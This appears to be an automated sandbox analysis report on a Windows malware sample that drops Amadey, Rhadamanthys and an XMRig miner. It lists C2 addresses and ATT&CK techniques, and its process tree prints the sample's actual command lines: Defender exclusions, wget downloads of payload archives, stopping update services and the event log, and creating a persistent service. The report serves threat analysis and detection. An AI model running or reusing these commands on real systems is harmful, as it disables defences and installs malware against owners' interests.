amadey | d242ca4c20d2ef9d416e7532b632db44b3199d0c48ef43b3d1144053aa996503

Analysis

max time kernel
150s
max time network
142s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
02/09/2024, 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys xmrig 3dae01 discovery evasion execution miner persistence stealer trojan upx

Malware Config

Extracted

Family

rhadamanthys

https://45.159.188.37:443/44194499adc4d2b753ee/gcj8ajmp.qnu3f

Extracted

Family

amadey

Version

4.41

Botnet

3dae01

http://185.208.158.116

http://185.209.162.226

http://89.23.103.42

Attributes

install_dir
239f17af5a
install_file
Hkbsse.exe
strings_key
91a6d9abcd7a774809c7ff7ced665178
url_paths
/hb9IvshS01/index.php

/hb9IvshS02/index.php

/hb9IvshS03/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1676 created 1252	1676	rhjryjyj.exe	21

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/2892-621-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-623-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-626-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-627-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-625-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-624-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-620-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-628-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2892-629-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
1044	powershell.exe
1740	powershell.exe
2964	powershell.exe
2796	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000400000001de06-533.dat	upx
behavioral1/memory/2856-551-0x0000000140000000-0x0000000140E3D000-memory.dmp	upx
behavioral1/memory/2252-603-0x0000000140000000-0x0000000140E3D000-memory.dmp	upx
behavioral1/memory/2892-615-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-618-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-617-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-621-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-623-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-626-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-627-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-625-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-624-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-620-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-616-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-619-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-628-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2892-629-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
26	raw.githubusercontent.com
27	raw.githubusercontent.com
28	bitbucket.org
29	bitbucket.org

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2576	powercfg.exe
1192	powercfg.exe
2104	powercfg.exe
2688	powercfg.exe
2600	powercfg.exe
2716	powercfg.exe
2220	powercfg.exe
284	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	2plugin27724
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	kuytqawknxye.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2856	2plugin27724
2856	2plugin27724
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2252 set thread context of 2240	2252	kuytqawknxye.exe	110
PID 2252 set thread context of 2892	2252	kuytqawknxye.exe	111

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	3plugin29563
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Executes dropped EXE 14 IoCs

pid	Process
2176	Launhcer.exe
2636	Launcher.exe
1656	wget.exe
1520	winrar.exe
1676	rhjryjyj.exe
2088	wget.exe
2924	winrar.exe
2856	2plugin27724
2828	wget.exe
1848	winrar.exe
2460	3plugin29563
2868	Hkbsse.exe
476	Process not Found
2252	kuytqawknxye.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2216	sc.exe
1924	sc.exe
2728	sc.exe
2508	sc.exe
2700	sc.exe
112	sc.exe
2512	sc.exe
1884	sc.exe
3052	sc.exe
1532	sc.exe
484	sc.exe
1708	sc.exe
1216	sc.exe
2808	sc.exe

Loads dropped DLL 20 IoCs

pid	Process
2288	Launcher.exe
1044	powershell.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2460	3plugin29563
2460	3plugin29563
476	Process not Found

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launhcer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhjryjyj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dialer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3plugin29563

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1656	wget.exe
2088	wget.exe
2828	wget.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 800395c04cfdda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\Certificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CRLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CTLs	dwm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1044	powershell.exe
1044	powershell.exe
1044	powershell.exe
1740	powershell.exe
1676	rhjryjyj.exe
1676	rhjryjyj.exe
3068	dialer.exe
3068	dialer.exe
3068	dialer.exe
3068	dialer.exe
2856	2plugin27724
2856	2plugin27724
2964	powershell.exe
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2856	2plugin27724
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2796	powershell.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2252	kuytqawknxye.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe
2892	dwm.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeShutdownPrivilege	2688	powercfg.exe
Token: SeShutdownPrivilege	2600	powercfg.exe
Token: SeShutdownPrivilege	1192	powercfg.exe
Token: SeShutdownPrivilege	2104	powercfg.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeShutdownPrivilege	2576	powercfg.exe
Token: SeShutdownPrivilege	2716	powercfg.exe
Token: SeShutdownPrivilege	2220	powercfg.exe
Token: SeShutdownPrivilege	284	powercfg.exe
Token: SeLockMemoryPrivilege	2892	dwm.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
1656	wget.exe
1520	winrar.exe
1520	winrar.exe
2088	wget.exe
2924	winrar.exe
2924	winrar.exe
2828	wget.exe
1848	winrar.exe
1848	winrar.exe
2460	3plugin29563

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2288 wrote to memory of 2176	2288	Launcher.exe	32
PID 2176 wrote to memory of 1044	2176	Launhcer.exe	33
PID 2176 wrote to memory of 1044	2176	Launhcer.exe	33
PID 2176 wrote to memory of 1044	2176	Launhcer.exe	33
PID 2176 wrote to memory of 1044	2176	Launhcer.exe	33
PID 2176 wrote to memory of 1044	2176	Launhcer.exe	33
PID 2176 wrote to memory of 1044	2176	Launhcer.exe	33
PID 2176 wrote to memory of 1044	2176	Launhcer.exe	33
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 1044 wrote to memory of 2636	1044	powershell.exe	35
PID 2636 wrote to memory of 1740	2636	Launcher.exe	36
PID 2636 wrote to memory of 1740	2636	Launcher.exe	36
PID 2636 wrote to memory of 1740	2636	Launcher.exe	36
PID 2636 wrote to memory of 1740	2636	Launcher.exe	36
PID 2636 wrote to memory of 1740	2636	Launcher.exe	36
PID 2636 wrote to memory of 1740	2636	Launcher.exe	36
PID 2636 wrote to memory of 1740	2636	Launcher.exe	36
PID 2636 wrote to memory of 1656	2636	Launcher.exe	38
PID 2636 wrote to memory of 1656	2636	Launcher.exe	38
PID 2636 wrote to memory of 1656	2636	Launcher.exe	38
PID 2636 wrote to memory of 1656	2636	Launcher.exe	38
PID 2636 wrote to memory of 1656	2636	Launcher.exe	38
PID 2636 wrote to memory of 1656	2636	Launcher.exe	38
PID 2636 wrote to memory of 1656	2636	Launcher.exe	38
PID 2636 wrote to memory of 1520	2636	Launcher.exe	40
PID 2636 wrote to memory of 1520	2636	Launcher.exe	40
PID 2636 wrote to memory of 1520	2636	Launcher.exe	40
PID 2636 wrote to memory of 1520	2636	Launcher.exe	40
PID 2636 wrote to memory of 1520	2636	Launcher.exe	40
PID 2636 wrote to memory of 1520	2636	Launcher.exe	40
PID 2636 wrote to memory of 1520	2636	Launcher.exe	40
PID 2636 wrote to memory of 1676	2636	Launcher.exe	41
PID 2636 wrote to memory of 1676	2636	Launcher.exe	41
PID 2636 wrote to memory of 1676	2636	Launcher.exe	41
PID 2636 wrote to memory of 1676	2636	Launcher.exe	41
PID 2636 wrote to memory of 1676	2636	Launcher.exe	41
PID 2636 wrote to memory of 1676	2636	Launcher.exe	41
PID 2636 wrote to memory of 1676	2636	Launcher.exe	41
PID 2636 wrote to memory of 2088	2636	Launcher.exe	42
PID 2636 wrote to memory of 2088	2636	Launcher.exe	42
PID 2636 wrote to memory of 2088	2636	Launcher.exe	42
PID 2636 wrote to memory of 2088	2636	Launcher.exe	42
PID 2636 wrote to memory of 2088	2636	Launcher.exe	42
PID 2636 wrote to memory of 2088	2636	Launcher.exe	42
PID 2636 wrote to memory of 2088	2636	Launcher.exe	42
PID 1676 wrote to memory of 3068	1676	rhjryjyj.exe	44
PID 1676 wrote to memory of 3068	1676	rhjryjyj.exe	44
PID 1676 wrote to memory of 3068	1676	rhjryjyj.exe	44
PID 1676 wrote to memory of 3068	1676	rhjryjyj.exe	44

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1252
- C:\Users\Admin\AppData\Local\Temp\Launcher.exe
  "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
    "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2176
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1044
    - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
        
        "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2636
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1740
      - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1656
      - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01*.* "1\*" C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1520
      - C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe
        
        "C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1676
      - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2088
      - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2924
      - C:\Users\Admin\AppData\Roaming\services\2plugin27724
        
        C:\Users\Admin\AppData\Roaming\services\2plugin27724
        6⤵
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2856
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:2824
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        Drops file in Windows directory
        
        PID:2572
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:1532
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:484
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1708
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:112
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:1216
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2688
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1192
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OZLCSUZD"
        7⤵
        Launches sc.exe
        
        PID:1924
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:2728
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:2508
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OZLCSUZD"
        7⤵
        Launches sc.exe
        
        PID:2512
      - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2828
      - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1848
      - C:\Users\Admin\AppData\Roaming\services\3plugin29563
        
        C:\Users\Admin\AppData\Roaming\services\3plugin29563
        6⤵
        Drops file in Windows directory
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2868
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2308
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3068

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
1⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2252
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2812
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2300
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2808
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2216
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2700
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1884
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3052
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:284
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2220
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2716
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2240
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
56162a4a6f907f4f0f1cddba9bc05bfc

SHA1
32713df100d16a0a9ce4789f0fbe99e8073ed93f

SHA256
def35e9207cb4df7c2b5010141cc5f86097afe370721250916c5c1cee338fc4b

SHA512
9c8d59bb54eae6c48b3280b083664d7e5cd70bf0686205464109499b52e423e4d973ff615f7d46bf3155c0f75656edc81e4117725e095051c3934ce146c8e60f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
eb47c1b96742d0c0710968f1e57f06e3

SHA1
7960c88d543e8bbd4d45366f768e0e330e4a292d

SHA256
